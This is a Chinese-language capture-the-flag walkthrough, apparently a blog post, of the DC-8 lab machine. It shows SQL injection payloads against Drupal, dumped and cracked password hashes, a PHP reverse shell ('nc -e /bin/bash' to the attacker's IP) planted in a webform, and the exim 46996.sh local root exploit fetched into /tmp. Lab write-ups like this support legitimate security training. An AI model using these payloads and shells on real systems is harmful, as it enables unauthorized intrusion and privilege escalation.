DC8 kali:192.168.0.105 DC8:192.168.0.160 nmap -T4 -A -p- 192.168.0.160 同样是80端口和robots.txt ![](https://img-blog.csdnimg.cn/41699217c8e4419b94b663d61065c94b.png) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==) drupal网站 且这个版本可以sql注入 sqlmap跑一下 /?nid=-1 union select group_concat(table_name) from information_schema.tables where table_schema=database() --+ ![](https://img-blog.csdnimg.cn/45670ea8fd534e2286a10a1c1f63ca01.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
/?nid=-1 union select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+ 爆出users表中name、pass列的数据,爆出两个用户名admin和john及密码加密后的密文 ![](https://img-blog.csdnimg.cn/c9be0ddbd7ca4fa9b8eee7f20951a114.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16)
admin ![](static/image/smiley/default/shy.gif) S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z john ![](static/image/smiley/default/shy.gif) S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF 提示有john用户。需要用john工具爆破密码 ![](https://img-blog.csdnimg.cn/1e08f271e8f24f21bb21d6a0da9dffa9.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
得到密码turtle 用这个用户登录网站 在左上角Find content - Contact Us- edit-右上角WEBFORM-Form settings处通过xss储存漏洞可以植入反弹shell <p>GETSHELL</p>
<script>alert(1)</script>
<?php
system("nc -e /bin/bash 192.168.0.105 6666");
?> ![](https://img-blog.csdnimg.cn/6fba177d544b424293a1eaaea52774a4.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
ok python -c 'import pty;pty.spawn("/bin/bash")' 提权 使用find命令查找具有suid权限的命令 找到一个exim4命令,exim是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限 DC-7有讲过 ![](https://img-blog.csdnimg.cn/ec69d5a9f7864b159a4be38620882380.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
查找exim4当前的版本号 /usr/sbin/exim4 –version 为4.89 查找exim的漏洞攻击脚本,找到46996.sh脚本文件 searchsploit exim ![](https://img-blog.csdnimg.cn/adc5b061e84f43a9bda53f1f5f9c0aaf.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==) 将46996.sh拷贝到本地并改名,并在kali开启http服务 cp /usr/share/exploitdb/exploits/linux/local/46996.sh getShell.sh
cat getShell.sh
python -m SimpleHTTPServer ![](https://img-blog.csdnimg.cn/f39605b8c7354f7b893f51bc1dcee9e3.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
在靶机上将getShell.sh脚本文件下载到靶机本地,并给脚本赋予执行权限
![](https://img-blog.csdnimg.cn/657abd96cc85462e9674613776953bf9.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](http://data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)
没有下载权限
后来尝试了各种方法包括apache
两个root加权
换到tmp目录,等等都不行
![](https://img-blog.csdnimg.cn/073a9ea9f1da4fb98e4c3057113d77a5.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16)
用powershell可以下载
说明不是kali里面的问题,而是靶机权限的问题
想不粗来了
后来尝试好久发现靶机cd /tmp后
居然可以下载了???
需要cd到/tmp里面因为这个靶机一进去本身是个地权限,然后只有到tmp里面才有读写,创建,下载文件
![](https://img-blog.csdnimg.cn/a9104592026e4585aad2c2fc4aa93d90.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16)
搜索发现这个报错是由于windows下编辑上传到linux下执行导致的
本地编辑查看文件类型 :set ff?,会出现 dos或unix格式,如果为dos,需要改为unix模式
编辑一下脚本,加上set ff=unix
![](https://img-blog.csdnimg.cn/467f6111eeb547098de4b1eb39193d8f.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16)
ok![](https://img-blog.csdnimg.cn/a0db2474d0c4484584566437f6d31875.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16) ![](https://img-blog.csdnimg.cn/7fb1c20e32e44b659f115e90a4ee3841.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAbTBfNTQ0ODc1ODM=,size_20,color_FFFFFF,t_70,g_se,x_16)
ok
比较有意思的是,这篇昨天做的,衡阳信安社区今天也复现了这个。
都讲到那个/tmp,盲猜大佬看到了我向群里和其他大佬问的问题和交流
|